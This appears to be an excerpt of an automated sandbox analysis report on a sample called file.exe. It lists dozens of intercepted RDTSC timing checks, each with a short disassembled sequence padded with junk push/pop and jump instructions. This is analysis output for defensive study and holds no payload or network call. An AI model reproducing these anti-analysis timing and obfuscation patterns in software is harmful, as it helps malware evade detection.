Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2222D second address: D22265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FA1D8D18340h 0x0000000b jmp 00007FA1D8D18345h 0x00000010 popad 0x00000011 jp 00007FA1D8D1833Ch 0x00000017 jnl 00007FA1D8D18336h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2240A second address: D2240E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D226E7 second address: D226ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D226ED second address: D226F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D226F9 second address: D226FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D226FD second address: D22701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D22701 second address: D2270E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2270E second address: D22714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D22883 second address: D22887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D22887 second address: D228A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c jo 00007FA1D8D64E5Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D228A3 second address: D228A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D228A7 second address: D228AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D22B65 second address: D22B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D22DF9 second address: D22E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D22E03 second address: D22E13 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1D8D18336h 0x00000008 jp 00007FA1D8D18336h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D22E13 second address: D22E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA1D8D64E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D23612 second address: D23623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 jo 00007FA1D8D1833Ah 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28D67 second address: D28D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28D6D second address: D28D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28D71 second address: D28D92 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1D8D64E6Ch 0x00000008 jmp 00007FA1D8D64E66h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28A1D second address: D28A29 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1D8D18336h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D28A29 second address: D28A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b js 00007FA1D8D64E56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2B614 second address: D2B61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2B61A second address: D2B61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2B61E second address: D2B63B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18346h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2B7AD second address: D2B7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2B7B3 second address: D2B7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FA1D8D18354h 0x0000000b ja 00007FA1D8D18336h 0x00000011 jmp 00007FA1D8D18348h 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2B7E1 second address: D2B7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31E5D second address: D31E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18349h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31E7A second address: D31E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31E86 second address: D31EB7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA1D8D18336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA1D8D18348h 0x00000012 jno 00007FA1D8D1833Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31EB7 second address: D31EE0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA1D8D64E5Fh 0x00000008 jmp 00007FA1D8D64E60h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31EE0 second address: D31EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31EE4 second address: D31EEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D315B1 second address: D315BB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1D8D1833Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31851 second address: D31856 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31856 second address: D31862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C943CD second address: C943D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C943D1 second address: C943D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C943D5 second address: C943DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D35161 second address: D35165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D35165 second address: D35169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3543E second address: D35444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3598A second address: D359A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D64E66h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A32C second address: D3A351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18347h 0x00000009 popad 0x0000000a push edx 0x0000000b jng 00007FA1D8D18336h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A351 second address: D3A39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FA1D8D64E66h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FA1D8D64E5Ch 0x00000019 pushad 0x0000001a jne 00007FA1D8D64E56h 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007FA1D8D64E63h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A519 second address: D3A521 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A69C second address: D3A6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A6A0 second address: D3A6B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FA1D8D1833Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5C28 second address: CE5C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1BF9 second address: CA1C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FA1D8D18336h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C06 second address: CA1C44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FA1D8D64E5Fh 0x0000000a jmp 00007FA1D8D64E69h 0x0000000f jp 00007FA1D8D64E56h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C44 second address: CA1C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA1D8D18336h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C53 second address: CA1C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40F06 second address: D40F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ecx 0x00000008 jp 00007FA1D8D18368h 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FA1D8D18336h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40F1C second address: D40F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41786 second address: D41792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA1D8D18336h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41792 second address: D41796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41FE3 second address: D42013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D18348h 0x00000009 jmp 00007FA1D8D18344h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4258F second address: D42595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42595 second address: D425B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FA1D8D18347h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42B87 second address: D42B8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42B8B second address: D42B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42B97 second address: D42B9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42B9D second address: D42BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42BA3 second address: D42BB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FA1D8D64E56h 0x00000009 jns 00007FA1D8D64E56h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B04F second address: C9B053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B053 second address: C9B065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA1D8D64E5Ah 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46CEC second address: D46CFA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46CFA second address: D46D06 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007FA1D8D64E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46D06 second address: D46D10 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1D8D18342h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46D10 second address: D46D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C05E second address: D4C071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D1833Eh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53CE5 second address: D53CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA1D8D64E56h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51E06 second address: D51E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51E0A second address: D51E27 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA1D8D64E61h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51E27 second address: D51E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18349h 0x00000007 jmp 00007FA1D8D1833Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51E52 second address: D51E88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA1D8D64E56h 0x00000009 jmp 00007FA1D8D64E67h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1D8D64E63h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52022 second address: D52026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5252A second address: D5252E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5252E second address: D52543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D1833Bh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52543 second address: D52562 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA1D8D64E69h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D526D8 second address: D526F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D18344h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D526F0 second address: D526F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52986 second address: D5298D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5198A second address: D51995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51995 second address: D5199B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5199B second address: D519A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C481 second address: D5C487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C487 second address: D5C490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C5F1 second address: D5C60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18343h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C60B second address: D5C617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA1D8D64E56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C778 second address: D5C797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FA1D8D18345h 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C797 second address: D5C79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C79D second address: D5C7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C7A6 second address: D5C7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C7AC second address: D5C7B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B516 second address: D6B51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B51C second address: D6B523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B523 second address: D6B52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B52B second address: D6B52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B09E second address: D6B0C0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA1D8D64E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007FA1D8D64E5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007FA1D8D64E56h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B0C0 second address: D6B0CD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1D8D18336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F198 second address: D6F1B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ED30 second address: D6ED34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
